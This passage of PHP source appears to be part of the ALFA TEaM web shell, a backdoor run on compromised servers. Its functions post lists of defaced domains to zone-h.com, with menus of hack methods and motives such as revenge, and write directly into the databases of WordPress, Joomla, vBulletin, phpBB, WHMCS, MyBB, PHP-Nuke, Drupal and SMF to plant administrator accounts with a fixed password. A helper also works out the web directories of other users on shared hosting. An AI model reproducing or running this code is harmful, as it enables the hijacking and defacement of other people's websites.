4162echo "</div>";
4163alfafooter();
4164}
4165function alfazoneh(){
4166alfahead();
4167echo '<div class=header>';
4168if(!function_exists('curl_version')){
4169echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";
4170}
4171$hackmode = array('known vulnerability (i.e. unpatched system)','undisclosed (new) vulnerability','configuration / admin. mistake','brute force attack','social engineering','Web Server intrusion','Web Server external module intrusion','Mail Server intrusion','FTP Server intrusion','SSH Server intrusion','Telnet Server intrusion','RPC Server intrusion','Shares misconfiguration','Other Server intrusion','SQL Injection','URL Poisoning','File Inclusion','Other Web Application bug','Remote administrative panel access bruteforcing','Remote administrative panel access password guessing','Remote administrative panel access social engineering','Attack against administrator(password stealing/sniffing)','Access credentials through Man In the Middle attack','Remote service password guessing','Remote service password bruteforce','Rerouting after attacking the Firewall','Rerouting after attacking the Router','DNS attack through social engineering','DNS attack through cache poisoning','Not available','Cross-Site Scripting');
4172$reason = array('Heh...just for fun!','Revenge against that website','Political reasons','As a challenge','I just want to be the best defacer','Patriotism','Not available');
4173echo '
4174<center><br><div class="txtfont_header">| Zone-h Mass Poster |</div><center><br>
4175<form action="" method="post" onsubmit="g(\'zoneh\',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,\'>>\'); return false;">
4176<input type="text" name="defacer" size="67" id="text" placeholder="ALFA TEaM 2012" />
4177<br>
4178<select id="text" name="hackmode" style="width:400px;">';
4179$x=1;
4180foreach($hackmode as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
4181echo '</select><br><select id="text" name="reason" style="width:200px;">';
4182$x=1;
4183foreach($reason as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
4184echo '</select><br>
4185<textarea name="domain" cols="90" rows="20" placeholder="Domains..."></textarea><br>
4186<p><input type="submit" value=" " name="go" /></p>
4187</form></center>';
4188if($_POST['alfa5'] && $_POST['alfa5'] == '>>'){
4189ob_start();
4190$hacker = $_POST['alfa1'];
4191$method = $_POST['alfa2'];
4192$neden = $_POST['alfa3'];
4193$site = $_POST['alfa4'];
4194if(empty($hacker)){
4195die (__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");
4196}elseif($method == "------------------------------------SELECT-------------------------------------"){
4197die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");
4198}elseif($neden == "------------------------------------SELECT-------------------------------------"){
4199die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");
4200}elseif(empty($site)){
4201die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");
4202}
4203$i = 0;
4204$sites = explode("\n", $site);
4205$alfa = new AlfaCURL();
4206while($i < count($sites)){
4207if(substr($sites[$i], 0, 4) != "http"){
4208$sites[$i] = "http://".$sites[$i];
4209}
4210$alfa->Send("http://www.zone-h.com/notify/single","post","defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden);
4211++$i;
4212}
4213echo __pre()."<center><font color =\"#00A220\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";
4214}
4215echo "</div>";
4216alfafooter();
4217}
4218function alfapwchanger(){
4219alfahead();
4220
4221echo '<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>
4222<center><h3>';
4223$vals = array('WordPress' => array('wp',2),'Joomla' => array('joomla',3),'vBulletin' => array('vb',5),'phpBB' => array('phpbb',6),'WHMCS' => array('whmcs',7),'MyBB' => array('mybb',8),'Php Nuke' => array('nuke',9),'Drupal' => array('drupal',10),'SMF' => array('smf',11));
4224Alfa_Create_A_Tag('pwchanger',$vals);
4225echo '</h3></center>';
4226if(isset($_POST['alfa1'])&&$_POST['alfa1']=='wp'){
4227
4228echo __pre().'<center><center><div class="txtfont_header">| WordPress |</div>
4229<p>'.getConfigHtml('wp').'</p><form onSubmit="g(\'pwchanger\',null,\'wp\',\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
4230$table = array('td1' =>
4231 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host','id'=>'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4232 'td2' =>
4233 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4234 'td3' =>
4235 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4236 'td4' =>
4237 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4238 'td5' =>
4239 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'),
4240 'td6' =>
4241 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4242 'td7' =>
4243 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4244 'td8' =>
4245 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4246);
4247create_table($table);
4248echo '<p><input value=" " name="send" type="submit"></p></form>';
4249if ($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
4250$localhost = $_POST['alfa3'];
4251$database = $_POST['alfa4'];
4252$username = $_POST['alfa5'];
4253$password = $_POST['alfa6'];
4254$admin = $_POST['alfa8'];
4255$SQL = $_POST['alfa9'];
4256$prefix = $_POST['alfa10'];
4257$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4258$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn));
4259$solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login='".$admin."'") or die(mysqli_error($conn));
4260$sole = @mysqli_num_rows($solevisible);
4261if ($sole == 1){
4262$solevis = @mysqli_fetch_assoc($solevisible);
4263$res = $solevis['ID'];
4264}
4265$solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','solevisible'),(null,'".$res."','last_name','solevisible'),(null,'".$res."','nickname','solevisible'),(null,'".$res."','description','solevisible'),(null,'".$res."','rich_editing','true'),(null,'".$res."','comment_shortcuts','false'),(null,'".$res."','admin_color','fresh'),(null,'".$res."','use_ssl','0'),(null,'".$res."','show_admin_bar_front','true'),(null,'".$res."','".$prefix."capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'".$res."','".$prefix."user_level','10'),(null,'".$res."','show_welcome_panel','1'),(null,'".$res."','".$prefix."dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
4266if($solevisible){
4267__alert('Success... '.$admin.' is created...');}
4268}
4269}
4270if($_POST['alfa2'] && $_POST['alfa2'] == 'joomla'){
4271
4272echo __pre().'<center><center><div class="txtfont_header">| Joomla |</div><p><p>'.getConfigHtml('joomla').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
4273$table = array('td1' =>
4274 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4275 'td2' =>
4276 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4277 'td3' =>
4278 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4279 'td4' =>
4280 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4281 'td5' =>
4282 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'),
4283 'td6' =>
4284 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4285 'td7' =>
4286 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4287 'td8' =>
4288 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4289);
4290create_table($table);
4291echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4292if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4293$localhost = $_POST['alfa3'];
4294$database = $_POST['alfa4'];
4295$username = $_POST['alfa5'];
4296$password = $_POST['alfa6'];
4297$admin = $_POST['alfa8'];
4298$SQL = $_POST['alfa9'];
4299$prefix = $_POST['alfa10'];
4300$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4301$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$SQL."','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
4302$solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username='".$admin."'") or die(mysqli_error($conn));
4303$sole =@mysqli_num_rows($solevisible);
4304if ($sole == 1){
4305$solevis =@mysqli_fetch_assoc($solevisible);
4306$res = $solevis['id'];
4307}
4308$solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysqli_error($conn));
4309if($solevisible){
4310__alert('Success... '.$admin.' is created...');}
4311}
4312}
4313if($_POST['alfa4'] && $_POST['alfa4'] == 'vb'){
4314
4315echo __pre().'<center><center><div class="txtfont_header">| vBulletin |<div><p>'.getConfigHtml('vb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">';
4316$table = array('td1' =>
4317 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4318 'td2' =>
4319 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4320 'td3' =>
4321 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4322 'td4' =>
4323 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4324 'td5' =>
4325 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
4326 'td6' =>
4327 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4328 'td7' =>
4329 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4330 'td8' =>
4331 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4332);
4333create_table($table);
4334echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4335if($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4336$localhost = $_POST['alfa2'];
4337$database = $_POST['alfa3'];
4338$username = $_POST['alfa5'];
4339$password = $_POST['alfa6'];
4340$prefix = $_POST['alfa7'];
4341$admin = $_POST['alfa8'];
4342$SQL = $_POST['alfa9'];
4343$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4344$solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','$SQL','".date('Y-m-d')."','".time()."')") or die(mysqli_error($conn));
4345$solevisible=@mysqli_query($conn,"select userid from {$prefix}user where username='".$admin."'") or die(mysqli_error($conn));
4346$sole = mysqli_num_rows($solevisible);
4347if($sole == 1){
4348$solevis = mysqli_fetch_assoc($solevisible);
4349$res = $solevis['userid'];
4350}
4351$solevisible=@mysqli_query($conn,"insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','16744444')") or die(mysqli_error($conn));
4352if($solevisible){
4353__alert('Success... '.$admin.' is created...');}
4354}
4355}
4356if(isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb'){
4357
4358echo __pre().'<center><div class="txtfont_header">| phpBB |</div><p><p>'.getConfigHtml('phpbb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
4359$table = array('td1' =>
4360 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4361 'td2' =>
4362 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4363 'td3' =>
4364 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4365 'td4' =>
4366 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4367 'td5' =>
4368 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
4369 'td6' =>
4370 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4371 'td7' =>
4372 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4373 'td8' =>
4374 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4375);
4376create_table($table);
4377echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4378if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4379$localhost = $_POST['alfa2'];
4380$database = $_POST['alfa3'];
4381$username = $_POST['alfa4'];
4382$password = $_POST['alfa6'];
4383$admin = $_POST['alfa8'];
4384$SQL = $_POST['alfa9'];
4385$prefix = $_POST['alfa10'];
4386$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4387$hash = md5('solevisible');
4388$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
4389$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
4390$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysqli_error($conn));
4391$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysqli_error($conn));
4392$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
4393if($solevisible){
4394__alert('Success... '.$admin.' is created...');
4395}
4396}
4397}
4398if(isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs'){
4399
4400echo __pre().'<center><div class="txtfont_header">| Whmcs |</div><p><p>'.getConfigHtml('whmcs').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value); return false;" method="POST">';
4401$table = array('td1' =>
4402 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4403 'td2' =>
4404 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4405 'td3' =>
4406 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4407 'td4' =>
4408 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4409 'td6' =>
4410 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4411 'td7' =>
4412 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4413 'td8' =>
4414 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4415);
4416create_table($table);
4417echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4418if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4419$localhost = $_POST['alfa2'];
4420$database = $_POST['alfa3'];
4421$username = $_POST['alfa4'];
4422$password = $_POST['alfa5'];
4423$admin = $_POST['alfa8'];
4424$SQL = $_POST['alfa9'];
4425$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4426$solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','d4a590caacc0be55ef286e40a945ea45','".$SQL."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
4427if($solevisible){
4428__alert('Success... '.$admin.' is created...');}
4429}
4430}
4431if(isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb'){
4432
4433echo __pre().'<center><div class="txtfont_header">| Mybb |</div><p><p>'.getConfigHtml('mybb').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
4434$table = array('td1' =>
4435 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4436 'td2' =>
4437 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4438 'td3' =>
4439 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4440 'td4' =>
4441 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4442 'td5' =>
4443 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
4444 'td6' =>
4445 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4446 'td7' =>
4447 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4448 'td8' =>
4449 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4450);
4451create_table($table);
4452echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4453if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4454$localhost = $_POST['alfa2'];
4455$database = $_POST['alfa3'];
4456$username = $_POST['alfa4'];
4457$password = $_POST['alfa5'];
4458$admin = $_POST['alfa8'];
4459$SQL = $_POST['alfa9'];
4460$prefix = $_POST['alfa10'];
4461$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4462$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','".$SQL."','4')") or die(mysqli_error($conn));
4463if($solevisible){
4464__alert('Success... '.$admin.' is created...');}
4465}
4466}
4467if(isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke'){
4468
4469echo __pre().'<center><div class="txtfont_header">| PhpNuke |</div><p><p>'.getConfigHtml('phpnuke').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value); return false;" method="POST">';
4470$table = array('td1' =>
4471 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4472 'td2' =>
4473 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4474 'td3' =>
4475 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4476 'td4' =>
4477 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4478 'td5' =>
4479 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
4480 'td6' =>
4481 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4482 'td7' =>
4483 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4484 'td8' =>
4485 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4486);
4487create_table($table);
4488echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4489if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4490$localhost = $_POST['alfa2'];
4491$database = $_POST['alfa3'];
4492$username = $_POST['alfa4'];
4493$password = $_POST['alfa5'];
4494$admin = $_POST['alfa7'];
4495$SQL = $_POST['alfa9'];
4496$prefix = $_POST['alfa10'];
4497$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4498$hash = md5($pwd);
4499$solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
4500if($solevisible){
4501__alert('Success... '.$admin.' is created...');}
4502}
4503}
4504if(isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal'){
4505
4506echo __pre().'<center><div class="txtfont_header">| Drupal |</div><p><p>'.getConfigHtml('drupal').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\'); return false;" method="POST">';
4507$table = array('td1' =>
4508 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4509 'td2' =>
4510 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4511 'td3' =>
4512 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4513 'td4' =>
4514 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4515 'td6' =>
4516 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4517 'td7' =>
4518 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true)
4519 );
4520create_table($table);
4521echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4522if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4523$localhost = $_POST['alfa2'];
4524$database = $_POST['alfa4'];
4525$username = $_POST['alfa5'];
4526$password = $_POST['alfa6'];
4527$admin = $_POST['alfa8'];
4528$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4529$getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1");
4530$getDescuid = @mysqli_fetch_assoc($getDescuid);
4531$getDescuid = $getDescuid['uid'];
4532$getdescuid = $getDescuid++;
4533$solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
4534$solevisible=@mysqli_query($conn,"select uid from users where name='".$admin."'") or die(mysqli_error($conn));
4535$sole = mysqli_num_rows($solevisible);
4536if ($sole == 1){
4537$solevis = mysqli_fetch_assoc($solevisible);
4538$res = $solevis['uid'];
4539}
4540$solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES ('".$res."', '3')") or die(mysqli_error($conn));
4541if($solevisible){
4542__alert('Success... '.$admin.' is created...');}
4543}
4544}
4545
4546if(isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf'){
4547
4548echo __pre().'<center><center><div class="txtfont_header">| SMF |</div><p><p>'.getConfigHtml('smf').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\'); return false;" method="POST">';
4549$table = array('td1' =>
4550 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4551 'td2' =>
4552 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4553 'td3' =>
4554 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4555 'td4' =>
4556 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4557 'td5' =>
4558 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'),
4559 'td6' =>
4560 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4561 'td7' =>
4562 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4563 );
4564create_table($table);
4565echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4566if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4567$localhost = $_POST['alfa2'];
4568$database = $_POST['alfa3'];
4569$username = $_POST['alfa5'];
4570$password = $_POST['alfa6'];
4571$prefix = $_POST['alfa7'];
4572$admin = $_POST['alfa8'];
4573$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4574$setpwAlg = sha1(strtolower($admin) . 'solevisible');
4575$solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','solevisible@fbi.gov')") or die(mysqli_error($conn));
4576if($solevisible){
4577__alert('Success... '.$admin.' is created...');}
4578}
4579}
4580echo "</div>";
4581alfafooter();
4582}
4583function alfaMakePwd(){
4584 if(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){
4585 return "/home/{user}/public_html/";
4586 }
4587 $document = explode("/", $_SERVER["DOCUMENT_ROOT"]);
4588 $public = end($document);
4589 array_pop($document);
4590 array_pop($document);
4591 $path = implode("/", $document) . "/{user}/" . $public;
4592 return $path;
4593}
